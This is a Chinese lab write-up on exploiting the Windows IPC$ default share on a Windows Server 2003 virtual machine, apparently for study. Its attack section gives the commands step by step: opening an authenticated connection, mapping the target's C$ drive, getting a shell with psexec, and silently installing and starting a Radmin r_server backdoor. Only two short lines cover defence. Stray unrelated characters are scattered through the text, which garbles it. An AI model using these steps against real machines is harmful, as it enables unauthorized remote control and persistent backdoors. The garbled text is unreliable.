0x00 漏洞說明
IPC$ (Internet Process Connection) 是共享“命名管道”的資源也拜,它是為了讓進(jìn)程間通信而開放的命名管道搂橙,通過提供可信任的用戶名和口令蝙叛,連接雙方可以建立安全的通道并以此通道進(jìn)行數(shù)據(jù)交換,從而實現(xiàn)對遠(yuǎn)程計算機(jī)的訪問鲸阔。IPC$是NT/2000及之后OS的一項新功能菲嘴。一些別有用心者可以利用黑客工具軟件對主機(jī)進(jìn)行IPC$漏洞探測。如果用戶設(shè)置的口令較弱而被破解蚌吸,那么通過建立IPC$連接的以下命令锈拨,攻擊者就可以輕易地進(jìn)入到系統(tǒng)中進(jìn)行任意操作。
0x01 工具準(zhǔn)備
操作系統(tǒng):
攻擊機(jī)器 任意windows系統(tǒng) 本次實驗中我所使用的是win10 專業(yè)版
目標(biāo)靶機(jī) windows xp 或者 windows server 2003 可以虛擬機(jī)羹唠,因為最近在玩webug奕枢,就直接使用windows server 2003了
實驗工具 鏈接:http://pan.baidu.com/s/1nuFbekh 密碼:lw0n
0x02 實驗過程
步驟1
使用net share命令觀察目標(biāo)靶機(jī)IPC$漏洞是否存在
步驟2
首先ping一下目標(biāo)靶機(jī),觀察網(wǎng)絡(luò)連通性佩微。
然后執(zhí)行 net use \ip “密碼” /user:”登陸賬戶”命令建立IPC$連接
使用 net use z: \ip\c$ 命令缝彬,將目標(biāo)靶機(jī)的C盤映射到本地z盤
完成上述命令后將會在計算機(jī)看到網(wǎng)絡(luò)位置出現(xiàn)了一個新的盤符,實際上目前就可以通過可視化桌面像在本地操作一樣拷貝文件哺眯。
步驟2.5
如果你想酷一點的話谷浅,我們來試試copy指令。將要使用的遠(yuǎn)程控制軟件拷貝到目標(biāo)靶機(jī)的C盤中族购。執(zhí)行過程如下:
步驟3
上述命令執(zhí)行完畢后壳贪,我們使用psexec啟動目標(biāo)靶機(jī)上的一個shell陵珍。
將路徑切換到psexec程序所在路徑下 寝杖,執(zhí)行如下命令:
psexec.exe \ip –u 用戶名 –p 密碼 cmd.exe
步驟4
接下來我們來安裝控制后門并啟動運(yùn)行。
使用如下指令實現(xiàn)r_server的靜默安裝:r_server /install /silence
執(zhí)行兩次net start r_server來啟動后門服務(wù)互纯,出現(xiàn)如下所示瑟幕,即啟動成功。
步驟5
接下來留潦,我們使用radmin來連接目標(biāo)靶機(jī)上運(yùn)行的r_server
添加完成后只盹,我們將可以像在本地一樣操作目標(biāo)靶機(jī)
0x03 防御
1 關(guān)閉IPC$默認(rèn)共享
2 關(guān)閉IPC$默認(rèn)共享的依賴服務(wù)server
控制面板/管理工具/服務(wù) 找到server 關(guān)閉